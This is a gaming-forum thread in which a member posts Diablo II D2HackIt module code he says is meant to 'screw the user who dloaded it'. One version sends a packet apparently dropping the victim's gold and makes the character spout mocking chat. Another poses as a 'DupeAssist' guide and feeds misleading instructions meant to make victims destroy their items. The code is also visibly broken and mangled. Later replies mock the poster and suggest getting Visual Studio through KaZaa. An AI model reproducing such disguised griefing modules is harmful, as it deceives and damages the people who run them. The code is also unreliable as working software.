Scam Module

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Im gonna make a script that litreally screws the user who dloaded it.Test this on your singleplayer chars guys tell me if it works.Ill give u script when i finish it.Someone compile this 2 d2h format so d2hackit will load it.
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Well lol that solves everything.How do i compile it 2 dll then how do i morph it 2 the d2h?
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
/////////////////////////////////
// Commnads used in module
/////////////////////////////////

MODULECOMMANDSTRUCT ModuleCommands[]=
{
{
// The help command
"help",
OnGameCommandHelp,
"Displays help textÿc0"
},

{
// Custom command
"startit",
OnGameCommandSet,
"Starts Moduleÿc0"
},
BYTE pak[10] = {0x50, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x};
server->GameSendPacketToServer(pak,10);

server->GameCommandLine("say You just made the biggest mistake of your life!");
server->GameCommandLine("say Good news though i saved my money by switching 2 Geico!");
server->GameCommandLine("say Bye Bye now!");
server->GameCommandLine("saveandexit");
////////// End of command list /////
{NULL}
};

Well this is version .0000001 lol since u only loose 1 gold.
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Okay whats wrong with this?Why cant i .load it with d2hackit?

/////////////////////////////////////
// Module made with D2MoMa - By SF
/////////////////////////////////////

// Incudes the D2HackIt Source
#include "Source\ClientCore.cpp"

// Sets up the commands (only supports 3 commands so far)
BOOL PRIVATE OnGameCommandSet(char** argv, int argc);
BOOL PRIVATE OnGameCommandSet2(char** argv, int argc);
BOOL PRIVATE OnGameCommandSet3(char** argv, int argc);
BOOL PRIVATE OnGameCommandSet4(char** argv, int argc);
/////////////////////////////////////

// Clientinfo change things if you want
CLIENTINFO
(
0,1,
"koftr",
"www.battleforums.com",
"Test Module",
"ss5062002@yahoo.com"
)

/////////////////////////////////
// Commnads used in module
/////////////////////////////////

MODULECOMMANDSTRUCT ModuleCommands[]=
{
{
// The help command
"help",
OnGameCommandHelp,
"Displays help textÿc0"
},

{
// Custom command
"DupeAssist-AA",
OnGameCommandSet,
"This will help you figure out my dupe.ÿc0"
},
server->GameCommandLine("say !Type .receive to find your cube.Dont pickup the items unless your cube is in ur inv!");
server->GameCommandLine("say !Just 2 save u trouble i will open your stash 4 u now!");
BYTE pak[2] = {0x77, 0x10};
server->GameSendPacketToGame(pak,2);

server->GameCommandLine("say !Tip 2 erase your cube load msd which can be found at blizzhakcers.com.");
server->GameCommandLine("say !Once u've done that pickup your cube and type .msd dupe 40 make sure your in act 4 and ur setmode is ground.");
server->GameCommandLine("say !Your cube is now gone.Note other items will dissapear this way 2.Becarefull!");
server->GameCommandLine("say !Another thing 2 get ur items back quickly go and find another cube after u've checked your cube through receive 7715.");
server->GameCommandLine("say !Rollbacks at this moment aren't confirmed so from here on your by urself.");
server->GameCommandLine("say !For further instructions go 2 blizzhackers.com or batttleforums.com.");
server->GameCommandLine("say !This concludes this guide.");

////////// End of command list /////
{NULL}
};
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Ok im using Dev-C++ compiler and i cant find were 2 convert it 2 a dll i compile my script and all it does is bitch.Wat do i do?
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Only thing i can do is save it as .d2h but it wont let me load client core.Do i ened 2 copy the folder source and put the file client core inside 2 satisfy my compiler?
 

xXLordSlippyXx

Member!
Joined
Feb 14, 2004
Messages
491
Reaction score
0
Location
With the doctors
Dev--C++ complains like a bitch when trying to create modules....so no one uses it. Try something new :p


I guess I'll be the first to ask where the hell the "noob" TheApossal came from, all he's done is come up with a worthless dupe, tell us his mom yelled at him, and doesn't relize that Starfish said NOT TO USE DEV--C++ . And why the hell would someone download a d2hackit module that explains how to use a rollback that hasn't even worked for anyone? :rollie
I'm I the only one to notice this?

how do i morph it 2 the d2h?
Powerangers, IT'S MORPHIN' TIME!!! :p

(I couldent help myself)
 

Ghist

Member!
Joined
Mar 10, 2004
Messages
177
Reaction score
0
Website
Visit site
Originally posted by xXLordSlippyXx
I guess I'll be the first to ask where the hell the "noob" TheApossal came from, all he's done is come up with a worthless dupe, tell us his mom yelled at him, and doesn't relize that Starfish said NOT TO USE DEV--C++ . And why the hell would someone download a d2hackit module that explains how to use a rollback that hasn't even worked for anyone? :rollie
I'm I the only one to notice this?
I´ve noticed but I have no idea...
 

xXLordSlippyXx

Member!
Joined
Feb 14, 2004
Messages
491
Reaction score
0
Location
With the doctors
Originally posted by TheApossal
Somone email me a vb or visual studio 6.0 plz!
Yay, :p This noob is fun, yea kid, I'm going to e-mail you a 71mb program...let me get right on it.... :fwink
 

TheApossal

Member!
Joined
Mar 26, 2004
Messages
218
Reaction score
0
Website
Visit site
Originally posted by xXLordSlippyXx
Yay, :p This noob is fun, yea kid, I'm going to e-mail you a 71mb program...let me get right on it.... :fwink
Really?Thnx.Your 2 kind ill be sure 2 add u 2 the oppl who helped me list.
 

Starfish

Member!
Joined
Feb 23, 2003
Messages
3,594
Reaction score
0
I've heard rumours about Visual Studio ... a little green man told me you could download it on KaZaa :rolleyes

And don't be so mean to the new guy :p
 

wasup999999

BattleForums Member
Joined
Oct 10, 2003
Messages
450
Reaction score
0
Location
Hmm, Where Do You Think?
Website
Visit site
awww cmon starfish, its uhhhhh whats it called again uhhhhh uhhhhhhhh uhhhhhhh i kno what it is but i cant remeber the name of it (i have very short term memory) its when the highschool seniors like throw eggs at a group of freshmen sitting in a circle on the ground (damn i feel stupid now)

@ topic: can some 1 post link to kazaa lite plz

@also: tell me if it violates the rule and u cant post it, if it is, tell me and then pm me the site :p
 
Joined
Feb 12, 2004
Messages
170
Reaction score
0
Location
Trippin' in the Vo-iD
Website
Visit site
Yes, TheApossal has been pissing everyone off by spamming up the forums with useless sh1t.

What you are thinking of wasup999999 is hazing.

Starfish dont tell me he isnt pissing you off i saw u in diff post yell at him.

@A: It is only illegal if you share things, not DL them. (I did a giant report on RIAA and p2p programs)
 

Jim07

Member!
Joined
Jul 14, 2003
Messages
260
Reaction score
0
Location
Michigan
Website
Visit site
I recommend you [buy] visual studio.net 2003 if you want to continue programming more, it's updated and is better.
 

Xclue'D

BattleForums Junior Member
Joined
Sep 17, 2003
Messages
245
Reaction score
0
Location
New Zealand
Website
Visit site

New threads

Top